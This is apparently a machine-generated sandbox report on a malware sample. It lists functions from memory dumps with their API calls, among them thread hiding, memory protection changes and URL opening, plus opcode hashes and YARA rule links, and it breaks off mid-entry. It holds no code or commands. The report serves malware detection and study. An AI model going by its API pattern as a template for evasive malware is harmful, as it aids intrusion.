Uniqueness Score: -1.00%

Function 00B05B12, Relevance: 1.6, APIs: 1, Instructions: 51nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: fbeaf28bf7116648e07d4289189de605eb2567fe13c4beea4ed9ca1658739cf4
Instruction ID: 23b2259b5f21d269bc2526d043a58e7f2588a26a5496fe9eb20ee75ab8fa2944
Opcode Fuzzy Hash: fbeaf28bf7116648e07d4289189de605eb2567fe13c4beea4ed9ca1658739cf4
Instruction Fuzzy Hash: E0012D20605B09DDEB395E24C59CBA63FE1EF12364FD962E6C842478E1D335C8C8CE52

Uniqueness

Uniqueness Score: -1.00%

Function 00B05B46, Relevance: 1.5, APIs: 1, Instructions: 47nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 19a74a7443f7471b839f04bc3cfc5bacd4b3d1bbbf10013b96fca2e0611f08f8
Instruction ID: 4f54e6c63e0d0d50f412a08a3948d0c3c07dec72c5ded48dbff80b688cb64e1a
Opcode Fuzzy Hash: 19a74a7443f7471b839f04bc3cfc5bacd4b3d1bbbf10013b96fca2e0611f08f8
Instruction Fuzzy Hash: A5012120515B099DEB385E24C19CBA23EE1EF12374FD962E6CC4246CE1D334C8C8CE51

Uniqueness

Uniqueness Score: -1.00%

Function 00B05B96, Relevance: 1.5, APIs: 1, Instructions: 44nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 46ab950461f956c22a7ad4f93d6d2ab5836c6d314ecd04eb1ee97131fb6d72fa
Instruction ID: f8e01b5dc20cca288d93158ebf44e11e8c48682a194c08ad004f9e9414b662cf
Opcode Fuzzy Hash: 46ab950461f956c22a7ad4f93d6d2ab5836c6d314ecd04eb1ee97131fb6d72fa
Instruction Fuzzy Hash: 9D01EC21515B099DEB395A24C19CBA22EE1EF12374FD962E7C841478E1D325C8C9CE52

Uniqueness

Uniqueness Score: -1.00%

Function 00B05BCB, Relevance: 1.5, APIs: 1, Instructions: 42nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 88270bb031b5e8c834090941502ee26cab789142776fecdfd163c7ae9e4158b0
Instruction ID: 21d9e2e136a5e78310cbdc673550c69aae912f700ba3b521a8c2c9ad362ea949
Opcode Fuzzy Hash: 88270bb031b5e8c834090941502ee26cab789142776fecdfd163c7ae9e4158b0
Instruction Fuzzy Hash: 15011D21615B099DEB395A24C15CBA22AE1EF52374FD962E6C841468E1D335C8C9CF51

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CB0BA, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 1D5CB0F5

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 1b42c3879f08ebcf3ef3374a46be7957f767fa96c2ddc8ba22dfd1d31bbc9460
Instruction ID: 014a5c35821ed771180d7cdd709ee0f30b4640589b33f270049cd94b0e90a0fe
Opcode Fuzzy Hash: 1b42c3879f08ebcf3ef3374a46be7957f767fa96c2ddc8ba22dfd1d31bbc9460
Instruction Fuzzy Hash: 7C018B35400644DFDB218F85D884B22FFA4EF08720F08C49ADE894B212C3B6A418EB72

Uniqueness

Uniqueness Score: -1.00%

Function 00B05C2A, Relevance: 1.5, APIs: 1, Instructions: 34nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 252261700982eb121b3cdb2d649a333e8b174b3a5c25abb2959351240a434074
Instruction ID: e8bafd7f0d28dbf3d99fc517df29b8aa9ed7d1680ae9367a40094a87e4575b81
Opcode Fuzzy Hash: 252261700982eb121b3cdb2d649a333e8b174b3a5c25abb2959351240a434074
Instruction Fuzzy Hash: D0F05E21615B0A9DEB395A28806C7A22EA2EF13364FDD12D6C8418B9A0D32188C9CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00B05C5C, Relevance: 1.5, APIs: 1, Instructions: 30nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 9b6deaf58f594b00801823010d619f28202061db09c9199b19fbb3f8a811e590
Instruction ID: b87b50a786a4cf014e2cdd76b316358c7f60bd302d60438eea66ae4598ec851f
Opcode Fuzzy Hash: 9b6deaf58f594b00801823010d619f28202061db09c9199b19fbb3f8a811e590
Instruction Fuzzy Hash: DEF0A721615A0A5CDB396A24905C7A62FA2DE52374BDC1296C841878A0D3218CC4CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00B05543, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00B051AA,00000040,00B01E73,00000000,00000000,00000000,00000000,?,00000000), ref: 00B0555C

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 00FAAE80, Relevance: .3, Instructions: 288COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d91643543e7e585faf0fed42bbd9bb1f0adbcd2550c4a955892cfea440a1bb
Instruction ID: a25a4ea86b8c444d08a447e57b36d775691aa8f135626b6c20cc7a98002b7709
Opcode Fuzzy Hash: 89d91643543e7e585faf0fed42bbd9bb1f0adbcd2550c4a955892cfea440a1bb
Instruction Fuzzy Hash: 9191E574B002049BDB08DBB9C854B6EB7E7AFC5354F258525E906DB390EF34EC019BA5

Uniqueness

Uniqueness Score: -1.00%

Function 1F9930C8, Relevance: 8.2, APIs: 1, Strings: 3, Instructions: 1230libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F9949F5
:@Dr, xrefs: 1F993912
:@Dr, xrefs: 1F9945B7

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr$:@Dr$:@Dr
API String ID: 2994545307-1395999109
Opcode ID: 7d24b3c841726883231b57285efafd4deb52c14c612fa78dc0e7fbd7d6c49c58
Instruction ID: ad857faf472c14b0b2c8e258adcaac7ccf861daab4f51c0175496c6c315ea21d
Opcode Fuzzy Hash: 7d24b3c841726883231b57285efafd4deb52c14c612fa78dc0e7fbd7d6c49c58
Instruction Fuzzy Hash: 80D2A774A006288FDB65DF68DC98A99BBF5FB48302F1181EAD809E7351DB309E81CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00FA7168, Relevance: 6.6, Strings: 5, Instructions: 343COMMON

Download Yara Rule

Strings

X1kr, xrefs: 00FA731D
X1kr, xrefs: 00FA72F6
X1kr, xrefs: 00FA7254
X1kr, xrefs: 00FA739A
X1kr, xrefs: 00FA7260

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID: X1kr$X1kr$X1kr$X1kr$X1kr
API String ID: 0-2722175440
Opcode ID: e976c6a9457f0c8e5b1f1d2552c0f74a8f82a9725354157aa265494afb9aee7b
Instruction ID: 8a311ee656593d70522c777672f425da94dd9ae895269186d26f92d1b8762672
Opcode Fuzzy Hash: e976c6a9457f0c8e5b1f1d2552c0f74a8f82a9725354157aa265494afb9aee7b
Instruction Fuzzy Hash: 18C1F3B1F083544FDB14DBA8CC80BADBBB6EB86334F19C166D529EB291C235EC419B50

Uniqueness

Uniqueness Score: -1.00%

Function 1F9930F8, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 694libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: a03ecd46e142ebffc3f35e6744ef37abcdb99476b4b6f1b56078d632c930cb00
Instruction ID: 157c971674a32a6181b73b59a3397aec77f0676965c3fe90803209c0992e5b67
Opcode Fuzzy Hash: a03ecd46e142ebffc3f35e6744ef37abcdb99476b4b6f1b56078d632c930cb00
Instruction Fuzzy Hash: E672A274A146288FCB61DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F993143, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 686libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: b8a65cd2aaa8f76209b745e562d31f0f3469d674ab4d3135ef42f7aa96393cf1
Instruction ID: b66256f933cf71e6c74cbd975aeaab287f5b9ebeca86cde9206110063392a346
Opcode Fuzzy Hash: b8a65cd2aaa8f76209b745e562d31f0f3469d674ab4d3135ef42f7aa96393cf1
Instruction Fuzzy Hash: CE729274A046289FCB61DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F993197, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 676libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: 0be1cd95c30e9fe232da76d7e0baea0e720cb0123bdd42b01a8c7079a6642367
Instruction ID: e1b7804f31c2660eea749da5be8e71150733a1b4ad4650813bf64a3895863843
Opcode Fuzzy Hash: 0be1cd95c30e9fe232da76d7e0baea0e720cb0123bdd42b01a8c7079a6642367
Instruction Fuzzy Hash: FC729274A046289FCB61DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F9931EB, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 666libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: 2d657be48c504a5ffbbc3684a97c75ace09c9fd450e777fb8c0bf540dcbc448f
Instruction ID: 73ba9616cce3c19e716a800862410fd1062a5513b18959649ce9acdfb031a749
Opcode Fuzzy Hash: 2d657be48c504a5ffbbc3684a97c75ace09c9fd450e777fb8c0bf540dcbc448f
Instruction Fuzzy Hash: 8E729274A046289FCB61DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F99323F, Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 654libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: f02de52cf373b45933aa0252bb970ac310699a690b81fc4e4ef8f33d68b1761b
Instruction ID: 0e28ada327c35b8076ea928aa1d36eb647f774b9d1c224017f848355f735ec38
Opcode Fuzzy Hash: f02de52cf373b45933aa0252bb970ac310699a690b81fc4e4ef8f33d68b1761b
Instruction Fuzzy Hash: 0A629274A046289FCB61DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F99328A, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 646libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: a8d5bce34e2689b748183580136c5d995404783591c832d340a3b5afb8580040
Instruction ID: b0966a0cf832cbbba36420078415e7c93f0453dd6e905222e6d6bb32b5f04d32
Opcode Fuzzy Hash: a8d5bce34e2689b748183580136c5d995404783591c832d340a3b5afb8580040
Instruction Fuzzy Hash: 34629274A046289FCB61DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F9932EA, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 633libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: 8d726d9353a757aba159c703dc4e21124fbfbcc9ef85e01837caac9a21ba8654
Instruction ID: ddf4d25799b22c5fc96842af1865c1815a52b3e2334d484c4b800a81f89ae3a3
Opcode Fuzzy Hash: 8d726d9353a757aba159c703dc4e21124fbfbcc9ef85e01837caac9a21ba8654
Instruction Fuzzy Hash: C2629274A046288FCB65DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F99333E, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 623libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: c2004899884809bae16405ce31599481a5d9fb253abd906fc6333ec97dea51c3
Instruction ID: 280db61644d61970560fe3e20e9aa1a3818d0b7d29736e3f09438eaf35c3c052
Opcode Fuzzy Hash: c2004899884809bae16405ce31599481a5d9fb253abd906fc6333ec97dea51c3
Instruction Fuzzy Hash: 8E629274A046288FCB61DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F993392, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 613libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: fb01e6d91529adde773f11877f887214a9aa520b5b82143c75f1820631c6b006
Instruction ID: 01ff6e1d9c1bdf29a9ef64092d4eee0f2b317a87d28dc576af96a124790fd906
Opcode Fuzzy Hash: fb01e6d91529adde773f11877f887214a9aa520b5b82143c75f1820631c6b006
Instruction Fuzzy Hash: 34629274A046289FCB61DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F9933E6, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 603libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: fdaa42abe6206d716366f8f8e3817e90b2e21c8196ce50b3cf21c2ba0c61c8a9
Instruction ID: 798699453526a6271a732ce8a00e4de967e1badc5ee92fecb56d994f89ae3440
Opcode Fuzzy Hash: fdaa42abe6206d716366f8f8e3817e90b2e21c8196ce50b3cf21c2ba0c61c8a9
Instruction Fuzzy Hash: D9629274A046288FCB65DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F99343A, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 593libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: c4c0264defddf09a394b1b5161658a1cb5904da9fb202c6a1c20cd8435fac143
Instruction ID: 2bd9dbfeaef617d06aa7206c86a610b60cab9253a2aea47b7f1bbdb2e76984ba
Opcode Fuzzy Hash: c4c0264defddf09a394b1b5161658a1cb5904da9fb202c6a1c20cd8435fac143
Instruction Fuzzy Hash: 56529274A046288FCB65DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F99348E, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 583libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: aaf044382e47f9915f3f7b1e7ac93f0fd788bc11410b327a5ae88851707abb41
Instruction ID: 3b08f806ad0aed34898aa4b8b9b6cfcafa7ce7383f3255861053322488a39bdd
Opcode Fuzzy Hash: aaf044382e47f9915f3f7b1e7ac93f0fd788bc11410b327a5ae88851707abb41
Instruction Fuzzy Hash: A3529274A046288FCB65DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F9934E2, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 573libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: 5bd27c47703664db0c4d28a8b593ae252747fb285eb82e195f7cee3013522f2c
Instruction ID: 712f24fc674b65bcf5ece9fd2e608640e8290a17912826759b579912be8234ce
Opcode Fuzzy Hash: 5bd27c47703664db0c4d28a8b593ae252747fb285eb82e195f7cee3013522f2c
Instruction Fuzzy Hash: B9528274A046288FCB65DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F993536, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 563libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: 19bc9fd3dd0fc9b64623a1548f7e7f2de6601f404ee3fe08ac9c66911dac2075
Instruction ID: e2b5d40c440587b39d5140bf1a5675df0107902e4a2aa4a6a86b50f92ab4163f
Opcode Fuzzy Hash: 19bc9fd3dd0fc9b64623a1548f7e7f2de6601f404ee3fe08ac9c66911dac2075
Instruction Fuzzy Hash: 3B528274A046288FCB65DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F99358A, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 553libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: 22fbf9f5224b177e897e565a8ce82d19ba8a80bb51f8a1289f4603008bab939a
Instruction ID: f64e23224647f6a2555a11adcf94d9f02ceeb88ca2610db9230b48f8e3109811
Opcode Fuzzy Hash: 22fbf9f5224b177e897e565a8ce82d19ba8a80bb51f8a1289f4603008bab939a
Instruction Fuzzy Hash: E8528374A046288FCB65DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F9935DE, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 543libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: e20d7c88e661d70c7f8babf1fb55f0bf62526ce88032f37a698f1e828e51a731
Instruction ID: c61e80fc9f2c1859b213493726378af84348e04f0ddaf5a03543fac3ae5b3843
Opcode Fuzzy Hash: e20d7c88e661d70c7f8babf1fb55f0bf62526ce88032f37a698f1e828e51a731
Instruction Fuzzy Hash: D2428274A046288FCB65DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F993632, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 533libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: e91456b3b2e556ad7800c822aa7b8af2b621d329f00c245c17b473b2dbdbc070
Instruction ID: 30f694ed93b769a756179a5bd1c2be5bbe2321545c22cc4c1d82bfa9a39f0a86
Opcode Fuzzy Hash: e91456b3b2e556ad7800c822aa7b8af2b621d329f00c245c17b473b2dbdbc070
Instruction Fuzzy Hash: 8D428274A046288FCB65DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F993686, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 521libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: 7adce1b7eb451e1f29ec279e015dcf8458edf92f57bb3c2b59ea2955e4b0bb7d
Instruction ID: b70324efc104910ccfe9ababe0b13618531fab6c9a29e445ccfa15d73c50d218
Opcode Fuzzy Hash: 7adce1b7eb451e1f29ec279e015dcf8458edf92f57bb3c2b59ea2955e4b0bb7d
Instruction Fuzzy Hash: C3428274A046288FCB65DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F9936D1, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 513libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: 18b7cc1422d6eefb656175a0b4a25b8285ddf38722bc229a853ca5febf36c45b
Instruction ID: 68aba665782f83e2ce05d0dddb50e07231f6e239912300141aec81e15542a4bc
Opcode Fuzzy Hash: 18b7cc1422d6eefb656175a0b4a25b8285ddf38722bc229a853ca5febf36c45b
Instruction Fuzzy Hash: DF428274A046288FCB65DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 1F993725, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 503libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F993860

Strings

:@Dr, xrefs: 1F993912

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: :@Dr
API String ID: 2994545307-3830894600
Opcode ID: 094e71d1f7ddbc58d5801acccb7b0582963ef7e069f25b00c22197d358961f65
Instruction ID: 9ca60bf274c856807684c68cd8ab06169fbf5fdbaa2c3f8f4b8b5dbf84c5469c
Opcode Fuzzy Hash: 094e71d1f7ddbc58d5801acccb7b0582963ef7e069f25b00c22197d358961f65
Instruction Fuzzy Hash: F0428274A046288FCB65DF68DC98A99BBF5FB48312F1181EAD909E3351DB309E81CF15

Uniqueness

Uniqueness Score: -1.00%

Function 00B02E26, Relevance: 3.1, APIs: 2, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00B03443,00000000,00000000,00000000,00000000), ref: 00B02E30
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00B02F0F

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: ce3a5267003c9408ac5e3e060300d7f6a2b706083f241ba0085d4e16843ce8fa
Instruction ID: 8f5009058c6110913e61184b8c2b8f45213bad5f4a009db08eb1010a738162d4
Opcode Fuzzy Hash: ce3a5267003c9408ac5e3e060300d7f6a2b706083f241ba0085d4e16843ce8fa
Instruction Fuzzy Hash: A431303024438BEFEB718F14CD89FEE3BE5EF05740F108465BD49AA5D1EB719A49AA10

Uniqueness

Uniqueness Score: -1.00%

Function 00FAD650, Relevance: 2.8, Strings: 2, Instructions: 324COMMON

Download Yara Rule

Strings

$%ir, xrefs: 00FAD8C5
,#ir, xrefs: 00FAD988

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID: $%ir$,#ir
API String ID: 0-1054650314
Opcode ID: 328b5cf15f511c08333101f595ee6740f548c20ac56d4ae64d955b936738252b
Instruction ID: 627e8eb3f44adfb5161250351f36938fd627f689410883858989547c930a753b
Opcode Fuzzy Hash: 328b5cf15f511c08333101f595ee6740f548c20ac56d4ae64d955b936738252b
Instruction Fuzzy Hash: 76B117B0F042148FDB559BB8886476EBBB6EFC5350F24846BD20AE77D1DE349C019B61

Uniqueness

Uniqueness Score: -1.00%

Function 00FA7220, Relevance: 2.6, Strings: 2, Instructions: 59COMMON

Download Yara Rule

Strings

X1kr, xrefs: 00FA7254
X1kr, xrefs: 00FA7260

Memory Dump Source

